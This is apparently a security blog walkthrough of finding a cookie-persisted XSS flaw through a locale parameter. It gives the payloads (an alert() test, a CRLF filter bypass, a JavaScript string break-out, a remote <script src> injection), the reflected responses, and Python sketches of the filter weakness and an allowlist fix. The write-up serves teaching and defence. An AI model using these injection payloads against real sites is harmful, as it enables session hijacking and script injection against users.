Sites that wish to appeal to a global audience use internationalization and localization techniques that substitute text and presentation styles based on a user’s language preferences. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and a member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encodings like UTF-8 were designed so apps could easily represent the written symbols for these languages.

A site’s written language conveys meaning to its visitors. A site’s programming language gives headaches to its developers. Misguided devs like to explain why their favored language is superior. Those same devs often prefer not to explain how they end up creating HTML injection vulns with their superior language.

Several previous posts here have shown how HTML injection attacks are reflected from a URL parameter into a web page, or even how the URL fragment – which doesn’t make a round trip to the app – isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, with the payload having been stored somewhere for later retrieval, such as being associated with a user’s session.

Sometimes the attack persists in the cookie itself.

Here’s a site that tracks a locale parameter in the URL, right where we like to test for vulns like XSS.

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

Sadly, no reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How impolite and inhibiting to our attacks.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.
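We never get to see the site’s filter, so the following is only a guess at the kind of mistake that would explain this behavior. It’s a minimal sketch of a hypothetical denylist (the names `DENYLIST` and `naive_locale_filter` are made up for illustration) whose regex assumes the payload sits on one line. In Python, as in many regex engines, `.` doesn’t match a newline unless you ask it to, so a line break in front of the interesting part slips past the check.

```python
import re

DEFAULT_LOCALE = "en_US"

# Hypothetical denylist, not the site's real code. Without re.DOTALL the
# '.' stops at the first newline, and '^' only anchors at the start.
DENYLIST = re.compile(r"^.*(<script|alert)", re.IGNORECASE)


def naive_locale_filter(value: str) -> str:
    """Silently revert to the default locale when the denylist matches."""
    if DENYLIST.search(value):
        return DEFAULT_LOCALE
    return value


# Single-line payload: caught and replaced with the default.
blocked = naive_locale_filter('en_US"><script>alert(9)</script>')

# Same payload with %0A%0D decoded in front of the tag: passes untouched.
bypassed = naive_locale_filter('en_US">\n\r<script>alert(9)</script>')
```

Whatever the real filter looks like, the lesson is the same: pattern-matching for “bad” strings tends to fail on inputs the author didn’t imagine.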

The catch is that some key characters in the attack have been rendered as their HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body>:

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&#034;&gt;



And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&#034;&gt;



And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;


" id="currentLocale" />
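The encoding at these reflection points is what keeps the payload stuck inside the attribute value. Here’s a rough sketch of that behavior using Python’s standard `html.escape`. The function name `hidden_locale_field` is hypothetical, and the site clearly uses some other encoder (it emits `&#034;` in places where Python emits `&quot;`), but browsers treat the two forms the same way.

```python
import html


def hidden_locale_field(value: str) -> str:
    """Write a value into a double-quoted attribute after HTML encoding it."""
    encoded = html.escape(value, quote=True)
    return (
        '<input type="hidden" name="_locale" value="%s" id="currentLocale" />'
        % encoded
    )


# Illustrative payload; the quote and angle brackets are what we need
# to break out of the attribute and start a new element.
payload = 'en_US"><script>alert(9)</script>'
field = hidden_locale_field(payload)
```

With the quote turned into `&quot;` the attribute never closes early, and with the angle brackets turned into `&lt;` and `&gt;` no new tag ever starts.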

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages.

With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag in the following example. We seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<html xmlns="" lang="en-US">


" xml:lang="en-US">


"> <head>

Plus, something we hadn’t seen before on this site – a reflection inside a JavaScript variable near the bottom of the <body> element.

(HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!-- Include the Reference Page Tag script -->
<script> var v = {}; v["v_locale"] = 'en_US"&gt;


'; </script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

">%0A%0D';alert(9)//

Too bad the apostrophe character (') remains encoded:

<script> var v = {}; v["v_locale"] = 'en_US&#034;&gt;

&#039;;alert(9)//'; </script>
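To see why that one encoded character matters, here’s a small sketch that drops a value into a single-quoted JavaScript string with and without encoding. `TEMPLATE`, `render_raw`, and `render_encoded` are hypothetical stand-ins for whatever the server really does, the payload is simplified (no line breaks), and Python’s `html.escape` writes the apostrophe as `&#x27;` where the site wrote `&#039;`.

```python
import html

# Hypothetical template mirroring the reflected <script> block.
TEMPLATE = "<script> var v = {}; v[\"v_locale\"] = '%s'; </script>"


def render_raw(value: str) -> str:
    """Concatenate the value as-is: the apostrophe ends the string early."""
    return TEMPLATE % value


def render_encoded(value: str) -> str:
    """HTML-encode first: the apostrophe becomes an entity, not a delimiter."""
    return TEMPLATE % html.escape(value, quote=True)


# Simplified break-out attempt.
payload = "en_US';alert(9)//"

raw_page = render_raw(payload)
encoded_page = render_encoded(payload)
```

In `raw_page` the string literal ends after `en_US` and `alert(9)` becomes a statement of its own. In `encoded_page` the whole payload stays inside the literal as inert text.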

That countermeasure shouldn’t stop us. This site’s developers took the time to write some insecure code. The least we can do is spend the time to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

As expected, the response contains the HTML encoded version of the payload. We lose quotes, but some of them are actually superfluous for this payload.

<body id="lang-en" class="tier-level-one cntry-US&#034;&gt;

&lt;script src=&#034;&#034;&gt;&lt;/script&gt;


Now, if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by

<html xmlns="" lang="en-US">

<script src=""></script>

" xml:lang="en-US">

<script src=""></script>

"> <head>

Yé! utúvienyes!

I have found it! But what was the underlying mechanism? The GET request to the contact page didn’t contain the payload. It’s just:

Thus, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A; JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
  sessionLocale="en_US\\"> <script src=\\"\\"></script> ";

Sometime between the request that carried the locale parameter and the request to the contact page, the site decided to place the parameter’s value into a cookie. Then the site took the cookie’s value from the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript) without encoding it, and let the user specify a custom locale.
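The whole round trip fits in a few lines. What follows is a sketch under loud assumptions: a plain dict stands in for the browser’s cookie jar, the function names (`locale_page`, `contact_page`, `safe_locale`) are invented, and the markup is trimmed down to one reflection point per page. It shows one page that encodes the value it reflects but stores the raw value, a second page that trusts the stored value, and an allowlist check that would have stopped the payload before it reached the cookie.

```python
import html
import re

DEFAULT_LOCALE = "en_US"

# Allowlist for values shaped like en_US or fr_CA (an assumption about
# which locales the site needs to support).
LOCALE_PATTERN = re.compile(r"[a-z]{2}_[A-Z]{2}")


def locale_page(param: str, cookies: dict) -> str:
    """First request: encode the reflection, but persist the raw value."""
    cookies["sessionLocale"] = param
    return '<input type="hidden" name="_locale" value="%s">' % html.escape(param)


def contact_page(cookies: dict) -> str:
    """Later request: the cookie is written into the HTML with no encoding."""
    locale = cookies.get("sessionLocale", DEFAULT_LOCALE)
    return '<html lang="%s">' % locale


def safe_locale(value: str) -> str:
    """Accept only well-formed locales; fall back to the default otherwise."""
    return value if LOCALE_PATTERN.fullmatch(value) else DEFAULT_LOCALE


cookies = {}
payload = 'en_US"> <script src=""></script> '
first = locale_page(payload, cookies)   # payload is encoded here
second = contact_page(cookies)          # payload is live here
```

Validating with `fullmatch` against a strict pattern sidesteps the denylist guessing game, though the contact page should still encode whatever it writes into the page.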